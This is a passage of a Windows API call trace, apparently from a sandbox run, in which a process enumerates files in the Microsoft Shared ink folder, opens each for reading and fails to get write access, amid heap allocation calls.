dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.775] CloseHandle (hObject=0x360) returned 1 [0085.775] AreFileApisANSI () returned 1 [0085.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85580 [0085.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x85580, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui") returned 73 [0085.775] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.775] GetLastError () returned 0x5 [0085.775] GetLastError () returned 0x5 [0085.775] SetLastError (dwErrCode=0x5) [0085.775] GetLastError () returned 0x5 [0085.775] SetLastError (dwErrCode=0x5) [0085.775] GetLastError () returned 0x5 [0085.775] SetLastError (dwErrCode=0x5) [0085.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85580 | out: hHeap=0x20000) returned 1 [0085.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0085.776] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.776] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.776] FindNextFileW (in: hFindFile=0x78bd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x50d00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⠀")) returned 0 [0085.776] FindClose (in: hFindFile=0x78bd0 | out: hFindFile=0x78bd0) returned 1 [0085.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0085.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0085.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0085.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0085.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0085.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0085.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45ef8 | out: hHeap=0x20000) returned 1 [0085.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0085.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0085.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0085.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0085.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0085.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0085.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0085.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0085.777] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.777] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.777] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.777] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0085.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.777] AreFileApisANSI () returned 1 [0085.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll", lpUsedDefaultChar=0x0) returned 64 [0085.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0085.777] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.777] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0085.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.777] AreFileApisANSI () returned 1 [0085.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0085.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0085.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6e250, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll") returned 64 [0085.777] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0085.781] GetFileType (hFile=0x35c) returned 0x1 [0085.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0085.782] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.782] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.782] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.782] CloseHandle (hObject=0x35c) returned 1 [0085.782] AreFileApisANSI () returned 1 [0085.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0085.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0085.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6ecf0, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll") returned 64 [0085.782] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.783] GetLastError () returned 0x5 [0085.783] GetLastError () returned 0x5 [0085.783] SetLastError (dwErrCode=0x5) [0085.783] GetLastError () returned 0x5 [0085.783] SetLastError (dwErrCode=0x5) [0085.783] GetLastError () returned 0x5 [0085.783] SetLastError (dwErrCode=0x5) [0085.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0085.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0085.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.783] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463d4edd, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x779da8e5, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463d4edd, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x3e9600, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="tabskb.dll", cAlternateFileName="")) returned 1 [0085.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0085.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0085.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0085.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0085.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0085.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0085.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0085.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0085.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.784] AreFileApisANSI () returned 1 [0085.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll", lpUsedDefaultChar=0x0) returned 62 [0085.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0085.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0085.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0085.784] AreFileApisANSI () returned 1 [0085.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0085.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e580 [0085.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6e580, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll") returned 62 [0085.784] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0085.784] GetFileType (hFile=0x35c) returned 0x1 [0085.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0085.785] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.785] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.785] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.785] CloseHandle (hObject=0x35c) returned 1 [0085.785] AreFileApisANSI () returned 1 [0085.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0085.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6df20 [0085.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll") returned 62 [0085.785] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.786] GetLastError () returned 0x5 [0085.786] GetLastError () returned 0x5 [0085.786] SetLastError (dwErrCode=0x5) [0085.786] GetLastError () returned 0x5 [0085.786] SetLastError (dwErrCode=0x5) [0085.786] GetLastError () returned 0x5 [0085.786] SetLastError (dwErrCode=0x5) [0085.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0085.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0085.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0085.786] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.786] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.786] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a8750a, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a8750a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x5f780, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="TabTip.exe", cAlternateFileName="")) returned 1 [0085.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0085.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0085.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0085.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0085.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0085.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0085.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0085.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0085.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.787] AreFileApisANSI () returned 1 [0085.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe", lpUsedDefaultChar=0x0) returned 62 [0085.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0085.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0085.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0085.787] AreFileApisANSI () returned 1 [0085.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0085.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0085.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe") returned 62 [0085.787] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabtip.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0085.787] GetFileType (hFile=0x35c) returned 0x1 [0085.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.788] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.788] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.788] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.788] CloseHandle (hObject=0x35c) returned 1 [0085.788] 